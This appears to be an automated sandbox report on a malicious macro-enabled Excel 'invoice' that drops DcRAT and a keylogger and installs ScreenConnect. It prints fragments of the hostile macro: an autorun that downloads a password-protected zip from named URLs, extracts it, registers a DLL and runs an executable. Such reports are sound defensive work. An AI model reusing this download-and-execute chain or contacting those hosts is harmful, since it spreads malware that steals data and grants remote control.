                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036859939.00000216C322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035735932.00000216C3B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034177266.00000216C3B4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                            Source: unknownHTTPS traffic detected: 149.137.136.16:443 -> 192.168.2.9:49693 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.9:49705 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.9:49874 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.9:49875 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.9:49876 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.9:49879 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.9:49880 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: newpoveno.exe PID: 5140, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: newpoveno.exe PID: 7468, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: newpoveno.exe PID: 7724, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED
Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7548, type: MEMORYSTR
Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, Keylogger.cs | .Net Code: KeyboardLayout
Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, Keylogger.cs | .Net Code: KeyboardLayout
Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, Keylogger.cs | .Net Code: KeyboardLayout
Source: svchost.exe, 00000010.00000003.6134213228.000002CA01290000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: F_WinAPI_RegisterRawInputDevices.au3Smemstr_f197c4c9-b

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

System Summary

Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPE | Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPE | Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPE | Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: screenshot | OCR: Enable Editing Required 11 12 13 Please click 'Enable Editing' to allow the Invoice Viewer to 14 fun
Source: Document25.xlsm | OLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
Source: Document25.xlsm | OLE, VBA macro line: Open Environ("TEMP") & "\invoice_log.txt" For Append As #fileNum
Source: Document25.xlsm | OLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
Source: Document25.xlsm | OLE, VBA macro line: currentPath = shell.Environment("PROCESS")("PATH")
Source: Document25.xlsm | OLE, VBA macro line: shell.Environment("PROCESS")("PATH") = folder & ";" & currentPath
Source: Document25.xlsm | OLE, VBA macro line: temp = Environ("TEMP") & "\invoice_temp\"
Source: VBA code instrumentation | OLE, VBA macro: Module Module2, Function ExecuteFile, String wscript: Set shell = CreateObject("WScript.Shell") | Name: ExecuteFile
Source: VBA code instrumentation | OLE, VBA macro: Module Module2, Function LogMessage, String environ: Open Environ("TEMP") & "\invoice_log.txt" For Append As # fileNum | Name: LogMessage
Source: VBA code instrumentation | OLE, VBA macro: Module Module2, Function AddToPath, String wscript: Set shell = CreateObject("WScript.Shell") | Name: AddToPath
Source: VBA code instrumentation | OLE, VBA macro: Module Module2, Function AddToPath, String environ: currentPath = shell.Environment("PROCESS")("PATH") | Name: AddToPath
Source: VBA code instrumentation | OLE, VBA macro: Module Module2, Function AddToPath, String environ: shell.Environment("PROCESS")("PATH") = folder & ";" & currentPath | Name: AddToPath
Source: VBA code instrumentation | OLE, VBA macro: Module Module2, Function ViewInvoiceOnline, String environ: temp = Environ("TEMP") & "\invoice_temp\" | Name: ViewInvoiceOnline
Source: Document25.xlsm | Stream path 'VBA/Module2': found possibly 'ADODB.Stream' functions open, read, write
Source: VBA code instrumentation | OLE, VBA macro: Module Module2, Function WriteBinaryFile, API ADODB.Stream.Open("C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.zip") | Name: WriteBinaryFile
Source: VBA code instrumentation | OLE, VBA macro: Module Module2, Function DownloadFile, API IServerXMLHTTPRequest2.Open("GET","https://f005.backblazeb2.com/file/newuploavir/newpoveno.zip",False) | Name: DownloadFile
Source: VBA code instrumentation | OLE, VBA macro: Module Module2, Function LogMessage, API ADODB.Stream.Open("C:\Users\user\AppData\Local\Temp\invoice_log.txt") | Name: LogMessage
Source: Document25.xlsm | Stream path 'VBA/Module2': found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: VBA code instrumentation | OLE, VBA macro: Module Module2, Function DownloadFile, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send | Name: DownloadFile
Source: VBA code instrumentation | OLE, VBA macro: Module Module2, Function DownloadTextFile, found possibly 'XMLHttpRequest' functions response, responsetext, status, open, send | Name: DownloadTextFile
Source: Document25.xlsm | Stream path 'VBA/Module2': found possibly 'WScript.Shell' functions currentdirectory, environment, exec, run, environ
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 12_2_02EA32C8 NtProtectVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 12_2_02EA2E72 NtProtectVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 24_2_018132D0 NtProtectVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 24_2_01813397 NtProtectVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 24_2_01812E7A NtProtectVirtualMemory
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\3dc3b4.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{A577F2E1-87E7-64F9-23B7-A2399481AED6}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIC5D7.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIC5F8.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSICABB.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\3dc3b6.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{A577F2E1-87E7-64F9-23B7-A2399481AED6}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{A577F2E1-87E7-64F9-23B7-A2399481AED6}\DefaultIcon
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Windows\Installer\wix{A577F2E1-87E7-64F9-23B7-A2399481AED6}.SchedServiceConfig.rmi
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\25wldwds.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\25wldwds.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\w3d3pmb2.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\w3d3pmb2.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\m5gid2hn.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\m5gid2hn.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\accgnjiz.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\accgnjiz.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\z2j5hc2t.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\z2j5hc2t.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\et4lifhj.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\et4lifhj.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\xzxwmyez.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\xzxwmyez.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\khv5ie0a.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\khv5ie0a.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\lfeaovex.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (ea32d473b92f819d)\lfeaovex.newcfg
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir7228_226220927
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSIC5F8.tmp
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FF727F8A8A0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FF727F861A0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FF727F87600
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FF727F89D10
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA20900300
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208DE6E0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208F4880
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208F3190
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208E3290
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208CA1D0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208D8300
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208F7450
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208EE470
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208F95F0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208CC610
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA209F66D0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208E4721
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208F8B40
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208F1B30
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208F5CB0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208F3BD0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208CECC0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208D8F80
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208F7FB0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208E4EF0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA20C88173
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA20E10C20
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA20F7AEA0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA20D85C50
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF9C04030E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 12_2_02EA26F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 12_2_02EA26E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 12_2_02EA2E72
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FF6CFFBA8A0
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FF6CFFB61A0
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FF6CFFB7600
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FF6CFFB9D10
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA16364721
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA164766D0
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA1634C610
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA16358300
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA16377450
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA1634A1D0
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA16363290
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA16364EF0
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA16358F80
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA1634ECC0
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA16373BD0
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA16708173
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA169FBF40
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA169FBFE0
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA169FAEA0
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA16890C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 24_2_01812700
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_018126EF24_2_018126EF
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_01812E7A24_2_01812E7A
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FF6CFFBA8A027_2_00007FF6CFFBA8A0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FF6CFFB61A027_2_00007FF6CFFB61A0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FF6CFFB760027_2_00007FF6CFFB7600
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FF6CFFB9D1027_2_00007FF6CFFB9D10
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFAA1D027_2_00007FFA1FFAA1D0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFC329027_2_00007FFA1FFC3290
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFB830027_2_00007FFA1FFB8300
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFD745027_2_00007FFA1FFD7450
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFAC61027_2_00007FFA1FFAC610
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA200D66D027_2_00007FFA200D66D0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFC472127_2_00007FFA1FFC4721
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFD3BD027_2_00007FFA1FFD3BD0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFAECC027_2_00007FFA1FFAECC0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFC4EF027_2_00007FFA1FFC4EF0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA1FFB8F8027_2_00007FFA1FFB8F80
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA20C8817327_2_00007FFA20C88173
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA20E10C2027_2_00007FFA20E10C20
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA20F7AEA027_2_00007FFA20F7AEA0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA20F7BFE027_2_00007FFA20F7BFE0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA20F7BF4027_2_00007FFA20F7BF40
                            Source: Document25.xlsm | OLE, VBA macro line: Private Sub Workbook_Open()
                            Source: Document25.xlsm | OLE, VBA macro line: Private Sub Workbook_Open()
                            Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function Workbook_Open | Name: Workbook_Open
                            Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open | Name: Workbook_Open
                            Source: Document25.xlsm | OLE indicator, VBA macros: true
                            Source: Document25.xlsm | Stream path 'VBA/__SRP_0' : https://tursiian.com/7z.txt$7zip_installer.exe/S47-Zip installation failed!8ZIP file failed to download!2(7-Zip installed at:* 7-Zip found at:(newpoveno.zip+vhttps://f005.backblazeb2.com/file/newuploavir/newpoveno.zit&ZIP downloaded to:* x -p123456 -y -oba).a(Extraction command:$*.*"Extracted files:$,,libcares-2.dll"nasrallah_x86.dll vcruntime210.dllnewpoveno.exe"-#Z00:00:010c>vcruntime210.dll not found at: .aFF!1Q1&mQ1@nasrallah_x86.dll not found at:$cmdViewInvoice@2iw<W2QRetry(: DLL exists=, EXE exists=:libcares-2.dll not found at: 6msvcp290.dll not found at:$Yl|8newpoveno.exe not found at:* Files verified:$ and(regsvr32.exe/s.2DLL registration output: LDLL registration attempted (no output).EXE execution attemptedEXE output:(WScript.Shell<Z>Z"Cleanup com
                            Source: C:\Program Files\7-Zip\7z.exe | Process token adjusted: Security
